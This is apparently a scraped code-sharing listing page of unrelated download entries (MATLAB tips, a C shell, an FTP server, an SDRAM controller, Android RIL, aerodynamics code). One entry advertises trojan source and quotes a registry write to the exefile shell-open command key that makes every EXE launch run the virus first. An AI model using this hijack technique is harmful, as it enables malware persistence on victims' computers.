I always believe that one will easily lag behind unless he keeps on learning. Of course, if I am given a chance for advanced studies in this famous University , I will stare to effort to master a good COMMAND of advance my capability.
標簽: learning believe always behind
上傳時間: 2017-06-13
上傳用戶:極客
unit ScardCL {**************************************************************************} { } { This C DLL header file first (automatic) conversion generated by: } { HeadConv 4.0 (c) 2000 by Bob Swart (aka Dr.Bob - www.drbob42.com) } { Final Delphi-Jedi (Darth) COMMAND-line units edition } { } { Generated Date: 07.04.2009 } { Generated Time: 05:10:54
上傳時間: 2017-06-18
上傳用戶:13215175592
HSSDRC IP core is the configurable universal SDRAM controller with adaptive bank control and adaptive COMMAND pipeline. HSSDRC IP core and IP core testbench has been written on SystemVerilog and has been tested in Modelsim. HSSDRC IP core is licensed under MIT License
標簽: configurable controller universal adaptive
上傳時間: 2017-06-25
上傳用戶:皇族傳媒
Kullanı lan bazı matlab bilgileri Matlabda kodlar mfile lara yazı lı p kaydedilebilir. Ü st menüden, file, new, mfile. COMMAND windowa yazdı kları nı zı kaydedemezsiniz. Yazdı ğ ı nı z kodu ç alı ş tı rabilmeniz iç in ç alı ş tı ğ ı nı z current directory nin altı na kaydetmelisiniz. Current directory i dosyanı n bulunduğ u yere de gö türebilirsiniz
標簽: 305 bilgileri kaydedile Matlabda
上傳時間: 2014-01-06
上傳用戶:miaochun888
Launch Matlab by either clicking twice on the Matlab icon on your desktop or by selecting: Start Programs Matlab Matlab. The main window is the MATLAB COMMAND Window, where you write your instructions.
標簽: Matlab selecting clicking desktop
上傳時間: 2017-06-30
上傳用戶:aa17807091
用純C語言編寫的一個Linux下的Shell,包含tch和bash的基本功能(包含重定向和后臺運行),暫時不支持管道。已經在cygwin和Ubantu 7.10下測試通過。 主要包含: makefile 編譯生成myshell可執行文件 myshell.c 主函數(涉及程序入口) utility.c 所有功能函數(將近1000行) myshell.h(包含宏定義、結構體聲明、庫函數的頭文件,及utility.c中的所有函數的聲明) readme 用戶手冊(當用戶在myshell里輸入help <COMMAND> 時,輸出<COMMAND>的使用說明)
上傳時間: 2014-02-05
上傳用戶:xymbian
A very simple ftp server s source code for demonstration. * It supports PASV/PORT modes and following operations: * ls,pwd,cwd,get,put,dele. * I have tested it using following ftp clients: * 1. Windows XP s COMMAND line ftp client, * 2. IE 6.0, * 3. Redhat 9.0 s ftp client, * 4. CuteFTP 8, * I ll introduce more functions and improve its performance
標簽: demonstration supports followi simple
上傳時間: 2013-12-22
上傳用戶:wl9454
Android的Radio Interface Layer (RIL)提供了電話服務和的radio硬件之間的抽象層。Radio Interface Layer RIL(Radio Interface Layer)負責數據的可靠傳輸、AT命令的發送以及response的解析。應用處理器通過AT命令集與帶GPRS功能的無線通訊模塊通信。AT COMMAND由Hayes公司發明,是一個調制解調器制造商采用的一個調制解調器命令語言,每條命令以字母"AT"開頭。
上傳時間: 2013-12-10
上傳用戶:pinksun9
可以在安全模式加載的木馬源代碼 寫注冊項 (#根類, “exefile\shell\open\COMMAND\”, 取特定目錄 (9) + “penguin01.exe ” + #引號 + “ 1” + #引號 + “ *”) 靠著這條就無敵啦``` 運行任意EXE文件 都會先運行病毒文件.
標簽: exefileshellopenCOMMAND penguin exe 01
上傳時間: 2014-01-02
上傳用戶:sardinescn
本程序的開發環境為MATLAB6.5版本,所編程序須在此環境下運行。由于氣動模型的離散性,且采用了許多工程計算經驗公式和實驗數據,所以在編程時會比較繁雜,為了使程序讀起來方便清晰,在編制程序時采用了如下的思路: 考慮到程序的一般結構,這里將氣動計算系統分為三大模塊:輸入模塊、氣動計算模塊以及結果輸出模塊。考慮到本系統的特殊性,又將輸入模塊劃分為初始數據輸入模塊、導彈外形參數模塊以及插值數據庫模塊,并采用M文件格式編制;氣動計算模塊則采用了子系統的結構形式,并用Simulink 模塊編制;結果輸出模塊則是采用M文件的形式將氣動計算模塊得到的結果輸出到工作區間并將數據結果繪制成曲線。最后,為了運行的方便,編制了一個名為Start_file.m的M文件,按流程依次調用編寫的所有程序,在運行此程序時,只需將所有程序加載于“Current Directory”指定的文件夾中(即路徑的設定),并在“COMMAND Window”中輸入“Start_file”即可。 (導彈氣動計算程序)
上傳時間: 2014-01-04
上傳用戶:xhz1993